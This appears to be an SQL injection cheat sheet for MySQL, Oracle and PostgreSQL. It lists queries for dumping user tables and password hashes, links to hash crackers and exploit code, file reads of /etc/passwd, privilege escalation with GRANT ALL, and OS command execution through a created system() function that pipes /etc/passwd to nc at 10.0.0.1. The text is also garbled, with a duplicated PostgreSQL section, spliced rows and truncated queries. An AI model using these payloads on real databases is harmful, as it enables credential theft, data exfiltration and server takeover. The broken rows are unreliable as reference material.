MySQL SQL Injection

CommandSQL QueryExplanation
VersionSELECT @@versionRetrieves the version of the MySQL server.
CommentsSELECT 1; #comment
SELECT /comment/1;
Demonstrates how to use comments in SQL queries. Single-line and multi-line comments are shown.
Current UserSELECT user();
SELECT system_user();
Retrieves the current MySQL user and the system user that the MySQL server is running as.
List UsersSELECT user FROM mysql.user; — privLists all users in the MySQL database. Requires administrative privileges.
List Password HashesSELECT host, user, password FROM mysql.user; — privRetrieves host, username, and password hashes from the MySQL user table. Requires administrative privileges.
Password Crackerhttp://www.openwall.com/john/Suggests a tool for cracking MySQL password hashes.
List PrivilegesSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — priv
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv
Lists various user privileges. The first query lists privileges from the information_schema database, while the second query lists detailed privileges for each user from the mysql.user table. Both require administrative privileges.
List DBA AccountsSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;
SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; — priv
Lists database administrator accounts. The first query checks user privileges in the information_schema, and the second query checks the Super_priv column in mysql.user. Both require administrative privileges.
Current DatabaseSELECT database()Retrieves the name of the current database.
List DatabasesSELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
Lists all databases. The first query lists schemas for MySQL version 5.0 and above, while the second query retrieves databases from the mysql.db table and requires administrative privileges.
List ColumnsSELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’Lists columns in all tables, excluding system tables, in the information_schema database.
List TablesSELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’Lists all tables, excluding system tables, in the information_schema database.
Find Tables From Column NameSELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’;Finds tables that contain a column named ‘username’ in the information_schema database.
Select Nth RowSELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Selects the Nth row from a table. The OFFSET keyword is used to specify which row to start from.
Select Nth CharSELECT substr(‘abcd’, 3, 1); # returns cSelects the Nth character from a string. In this example, it returns the 3rd character from the string ‘abcd’.
Bitwise ANDSELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
Demonstrates the use of bitwise AND operation in SQL. In these examples, it performs a bitwise AND on the numbers 6 and 2, and 6 and 1, respectively.
ASCII Value -> CharSELECT char(65); # returns AConverts an ASCII value to its corresponding character. In this example, ASCII 65 is converted to ‘A’.
Char -> ASCII ValueSELECT ascii(‘A’); # returns 65Converts a character to its corresponding ASCII value. In this example, ‘A’ is converted to ASCII 65.
CastingSELECT cast(‘1’ AS unsigned integer);
SELECT cast(‘123’ AS char);
Demonstrates how to cast data types in SQL. The first query casts the string ‘1’ to an unsigned integer, and the second query casts the string ‘123’ to a character data type.
String ConcatenationSELECT CONCAT(‘A’,‘B’); #returns AB
SELECT CONCAT(‘A’,‘B’,‘C’); # returns ABC
Shows how to concatenate strings in SQL. The first query concatenates ‘A’ and ‘B’, and the second query concatenates ‘A’, ‘B’, and ‘C’.
If StatementSELECT if(1=1,‘foo’,‘bar’); — returns ‘foo’Demonstrates the use of an IF statement in SQL. This query checks if 1 equals 1 and returns ‘foo’; otherwise, it would return ‘bar’.
Case StatementSELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns ADemonstrates the use of a CASE statement in SQL. This query checks if 1 equals 1 and returns ‘A’; otherwise, it would return ‘B’.
Avoiding QuotesSELECT 0x414243; # returns ABCShows how to use hexadecimal values to avoid quotes in SQL queries. This query returns the string ‘ABC’ from its hexadecimal representation.
Time DelaySELECT BENCHMARK(1000000,MD5(‘A’));
SELECT SLEEP(5); # >= 5.0.12
Introduces methods to create a time delay in SQL queries. The BENCHMARK function repeats an operation a specified number of times, and SLEEP pauses execution for a specified number of seconds.
Make DNS RequestsImpossible?Notes that making DNS requests through MySQL is generally not possible.
Command Executionhttp://www.0xdeadbeef.info/exploits/raptor_udf.cExplains how to execute OS commands via MySQL under certain conditions, by uploading a shared object file into the server’s library directory. Requires administrative privileges and specific server configurations.
Local File Access…’ UNION ALL SELECT LOAD_FILE(’/etc/passwd’) — priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
Demonstrates how to access local files through SQL queries. The first query reads a file, and the second writes to a file. Both require administrative privileges.
Hostname, IP AddressSELECT @@hostname;Retrieves the hostname of the MySQL server.
Create UsersCREATE USER test1 IDENTIFIED BY ‘pass1’; — privCreates a new user in MySQL with the specified password. Requires administrative privileges.
Delete UsersDROP USER test1; — privDeletes a user from MySQL. Requires administrative privileges.
Make User DBAGRANT ALL PRIVILEGES ON . TO test1@’%’; — privGrants a user all privileges on all databases and tables, effectively making them a DBA. Requires administrative privileges.
Location of DB filesSELECT @@datadir;Retrieves the directory where database files are stored in the MySQL server.
Default/System Databasesinformation_schema (>= mysql 5.0)
mysql
Lists default and system databases in MySQL. ‘information_schema’ is available from MySQL version 5.0 and above, and ‘mysql’ is the system database that contains user and privilege information.

Oracle SQL Injection

CommandSQL QueryExplanation
VersionSELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$instance;
Retrieves the version of the Oracle database. The first query gets the Oracle DB version, the second gets the Oracle TNS Listener version, and the third gets the instance version.
CommentsSELECT 1 FROM dual — commentDemonstrates how to use comments in SQL queries in Oracle. ‘dual’ is a special table used in Oracle.
Current UserSELECT user FROM dualRetrieves the current user of the Oracle database.
List UsersSELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; — priv
Lists all users in the Oracle database. The first query lists usernames from the all_users view, and the second query, which requires administrative privileges, lists users from the sys.user$ table.
List Password HashesSELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked
SELECT name,spare4 FROM sys.user$ — priv, 11g
Retrieves user names and password hashes from the Oracle database. The first query is for Oracle versions up to 10g and includes account status, while the second query is for version 11g. Both require administrative privileges.
Password Crackerhttp://www.red-database-security.com/software/checkpwd.htmlSuggests a tool for cracking Oracle password hashes.
List PrivilegesSELECT * FROM session_privs; — current privs
SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs
SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
Lists privileges of users in the Oracle database. The first query lists current session privileges, the second lists privileges of a specific user, the third finds users with a particular privilege, and the fourth lists roles granted to users. The last three queries require administrative privileges.
List DBA AccountsSELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA rolesLists database administrator accounts in Oracle. This query finds users with administrative privileges and requires administrative privileges itself.
Current DatabaseSELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;
Retrieves the name of the current Oracle database. Each query provides a different way to obtain the current database or instance name.
List DatabasesSELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
— Also query TNS listener for other databases. See http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html (services
status).
List ColumnsSELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
Lists columns in Oracle tables. The first query lists columns of a specified table, and the second query specifies both table and owner.
List TablesSELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
Lists all tables in Oracle. The first query lists table names, and the second includes the owner of each table.
Find Tables From Column NameSELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper caseFinds Oracle tables that contain a specific column. The query lists tables with a column name like ‘%PASS%’. Note that Oracle table names are usually in uppercase.
Select Nth RowSELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)Retrieves the Nth row from a result set in Oracle. This example gets the 9th row from the all_users table. Oracle rows are numbered starting from 1.
Select Nth CharSELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’Retrieves the Nth character from a string in Oracle. This example gets the 3rd character from ‘abcd’.
Bitwise ANDSELECT bitand(6,2) FROM dual; — returns 2
SELECT bitand(6,1) FROM dual; — returns 0
Demonstrates the use of bitwise AND in Oracle. The first query returns 2, and the second returns 0.
ASCII Value -> CharSELECT chr(65) FROM dual; — returns AConverts an ASCII value to its corresponding character in Oracle. This example converts ASCII 65 to ‘A’.
Char -> ASCII ValueSELECT ascii(‘A’) FROM dual; — returns 65Converts a character to its corresponding ASCII value in Oracle. This example converts ‘A’ to ASCII 65.
CastingSELECT CAST(1 AS char) FROM dual;
SELECT CAST(‘1’ AS int) FROM dual;
Demonstrates how to cast data types in Oracle SQL. The first query casts the number 1 to a character, and the second casts the string ‘1’ to an integer.
String ConcatenationSELECT ‘A’
If StatementBEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statementsDemonstrates the use of an IF statement in Oracle, using PL/SQL. This example uses dbms_lock.sleep for a conditional time delay. Note that IF statements are typically used in PL/SQL blocks rather than directly in SELECT statements.
Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
Demonstrates the use of a CASE statement in Oracle SQL. The first query returns 1 if the condition is true (1=1), and the second returns 2 if the condition is false (1=2).
Avoiding QuotesSELECT chr(65)
Time DelayBEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name(‘10.0.0.1’) FROM dual; — if reverse looks are slow
SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow
SELECT UTL_HTTP.REQUEST(‘http://google.com/') FROM dual; — if outbound TCP is filtered / slow
— Also see http://technet.microsoft.com/en-us/library/cc512676.aspx to create a time delay
Introduces methods to create a time delay in Oracle SQL. The DBMS_LOCK.SLEEP function pauses execution, but it’s generally not embeddable in a SELECT statement. Other methods involve slow network operations.
Make DNS RequestsSELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
SELECT UTL_HTTP.REQUEST(‘http://google.com/') FROM dual;
Demonstrates how to make DNS requests in Oracle SQL. The first query resolves an IP address, and the second makes an HTTP request.
Command Executionhttp://www.0xdeadbeef.info/exploits/raptor_oraexec.sqlProvides a link to an exploit that can be used to execute commands in Oracle under certain conditions.
Local File Accesshttp://www.0xdeadbeef.info/exploits/raptor_oraexec.sql — can sometimes be used. Check that the following is non-null: SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;
http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql — can be used to read and write files if installed (not available in Oracle Express).
Provides links to exploits that can be used for local file access in Oracle. The first exploit checks the ‘utl_file_dir’ parameter, and the second exploit can be used to read and write files.
Hostname, IP AddressSELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
SELECT UTL_INADDR.get_host_name(‘10.0.0.1’) FROM dual; — gets hostnames
Retrieves the hostname and IP address of the Oracle server. The queries use different functions and views to obtain this information.
Location of DB filesSELECT name FROM V$DATAFILE;Retrieves the locations of database files in Oracle. This query lists the data files as seen in the V$DATAFILE view.
Default/System DatabasesSYSTEM
SYSAUX
Lists default and system databases in Oracle. ‘SYSTEM’ and ‘SYSAUX’ are key system tablespaces in Oracle.

Postgres SQL Injection

CommandSQL QueryExplanation
VersionSELECT version()Retrieves the version of the PostgreSQL database.
CommentsSELECT 1; –comment
SELECT /comment/1;
Demonstrates how to use comments in SQL queries in PostgreSQL. Both – and /* */ are used for commenting.
Current UserSELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
Retrieves the current user of the PostgreSQL database. Multiple ways are shown to get the username, including from the pg_user system table.
List UsersSELECT usename FROM pg_userLists all users in the PostgreSQL database. pg_user is a system catalog view that shows user information.
List Password HashesSELECT usename, passwd FROM pg_shadow – privRetrieves user names and password hashes from the PostgreSQL database. This query requires administrative privileges and is run on the pg_shadow table, which contains information about users.
Password Crackerhttp://pentestmonkey.net/blog/cracking-postgres-hashes/Suggests a tool for cracking PostgreSQL’s MD5-based password hashes.
List PrivilegesSELECT usename, usecreatedb, usesuper, usecatupd FROM pg_userLists privileges of users in the PostgreSQL database. The query shows which users have privileges like creating databases, superuser access, and catalog update permissions.
List DBA AccountsSELECT usename FROM pg_user WHERE usesuper IS TRUELists database administrator accounts in PostgreSQL. This query finds users with superuser privileges.
Current DatabaseSELECT current_database()Retrieves the name of the current PostgreSQL database. current_database() is a function that returns the database name.
List DatabasesSELECT datname FROM pg_databaseLists all databases in PostgreSQL. pg_database is a system catalog that contains information about databases.
List ColumnsSELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=‘r’) AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’)Lists columns in PostgreSQL tables. This query joins several system catalogs to list columns in tables in the ‘public’ schema.
List TablesSELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,’’) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)Lists all tables in PostgreSQL. This query filters out system tables and lists user-defined tables.
Find Tables From Column NameSELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=‘r’) AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’;Finds PostgreSQL tables that contain a specific column. This query is useful for identifying tables with columns containing specific names, such as those related to passwords.
Select Nth RowSELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; – rows numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
Retrieves the Nth row from a result set in PostgreSQL. This example demonstrates getting the first and second rows from the pg_user table. PostgreSQL rows are numbered starting from 0.
Select Nth CharSELECT substr(‘abcd’, 3, 1); – returns cRetrieves the Nth character from a string in PostgreSQL. This example gets the 3rd character from ‘abcd’.
Bitwise ANDSELECT 6 & 2; – returns 2
SELECT 6 & 1; – returns 0
Demonstrates the use of bitwise AND in PostgreSQL. The first query returns 2, and the second returns 0.
ASCII Value -> CharSELECT chr(65);Converts an ASCII value to its corresponding character in PostgreSQL. This example converts ASCII 65 to ‘A’.
Char -> ASCII ValueSELECT ascii(‘A’);Converts a character to its corresponding ASCII value in PostgreSQL. This example converts ‘A’ to ASCII 65.
CastingSELECT CAST(1 as varchar);
SELECT CAST(‘1’ as int);
Demonstrates how to cast data types in PostgreSQL. The first query casts the number 1 to a varchar, and the second casts the string ‘1’ to an integer.
String ConcatenationSELECT ‘A’
If StatementIF statements only seem valid inside functions, so aren’t much use for SQL injection. See CASE statement instead.Explains that IF statements are typically used inside PL/pgSQL functions in PostgreSQL and are not directly applicable for SQL injection.
Case StatementSELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; – returns ADemonstrates the use of a CASE statement in PostgreSQL. This query returns ‘A’ if the condition (1=1) is true.
Avoiding QuotesSELECT CHR(65)
Time DelaySELECT pg_sleep(10); – postgres 8.2+ only
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6’, ‘sleep’ language ‘C’ STRICT; SELECT sleep(10); – priv, create your own sleep function. Taken from http://www.portcullis.co.uk/uplds/whitepapers/Having_Fun_With_PostgreSQL.pdf.
Introduces methods to create a time delay in PostgreSQL SQL. The pg_sleep function pauses execution, and the second query demonstrates creating a custom sleep function. Note that the creation of a custom function requires administrative privileges.
Make DNS RequestsGenerally not possible in postgres. However if http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.html is installed (it isn’t by default) it can be used to resolve hostnames (assuming you have DBA rights): SELECT * FROM dblink(‘host=put.your.hostname.here user=someuser dbname=somedb’, ‘SELECT version()’) RETURNS (result TEXT); Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. “ping pentestmonkey.net”.Notes that making DNS requests through PostgreSQL is generally not possible. However, the dblink function or OS-level commands (for users with DBA rights) can be used for this purpose.
Command ExecutionCREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6’, ‘system’ LANGUAGE ‘C’ STRICT; – priv
SELECT system(‘cat /etc/passwd
nc 10.0.0.1 8080’); – priv, commands run as postgres/pgsql OS-level user
Local File AccessCREATE TABLE mydata(t text);
COPY mydata FROM ‘/etc/passwd’; – priv, can read files which are readable by postgres OS-level user
… UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; – get data back one and the second returns 0.
ASCII Value -> CharSELECT chr(65);Converts an ASCII value to its corresponding character in PostgreSQL. This example converts ASCII 65 to ‘A’.
Char -> ASCII ValueSELECT ascii(‘A’);Converts a character to its corresponding ASCII value in PostgreSQL. This example converts ‘A’ to ASCII 65.
CastingSELECT CAST(1 as varchar);
SELECT CAST(‘1’ as int);
Demonstrates how to cast data types in PostgreSQL SQL. The first query casts the number 1 to a varchar, and the second casts the string ‘1’ to an integer.
String ConcatenationSELECT ‘A’
If StatementIF statements only seem valid inside functions, so aren’t much use for SQL injection. See CASE statement instead.Notes that IF statements in PostgreSQL are typically used inside PL/pgSQL functions and are not directly applicable for SQL injection. The CASE statement is suggested as an alternative.
Case StatementSELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; – returns ADemonstrates the use of a CASE statement in PostgreSQL SQL. This query returns ‘A’ if the condition is true (1=1).
Avoiding QuotesSELECT CHR(65)
Time DelaySELECT pg_sleep(10); – postgres 8.2+ only
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6’, ‘sleep’ language ‘C’ STRICT; SELECT sleep(10); – priv, create your own sleep function. Taken from http://www.portcullis.co.uk/uplds/whitepapers/Having_Fun_With_PostgreSQL.pdf .
Introduces methods to create a time delay in PostgreSQL SQL. The pg_sleep function pauses execution for a specified number of seconds. The second method involves creating a custom sleep function using C language. This requires administrative privileges.
Make DNS RequestsGenerally not possible in PostgreSQL. However, if http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.html is installed (it isn’t by default) it can be used to resolve hostnames (assuming you have DBA rights):
SELECT * FROM dblink(‘host=put.your.hostname.here user=someuser dbname=somedb’, ‘SELECT version()’) RETURNS (result TEXT);
Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. “ping pentestmonkey.net”.
Notes that making DNS requests through PostgreSQL is generally not possible. However, with certain extensions or DBA rights, there are workarounds like using dblink or OS-level commands.
Command ExecutionCREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6’, ‘system’ LANGUAGE ‘C’ STRICT; – priv
SELECT system(‘cat /etc/passwd
nc 10.0.0.1 8080’); – priv, commands run as postgres/pgsql OS-level user

Last updated 26 Apr 2024, 15:18 +0530 . history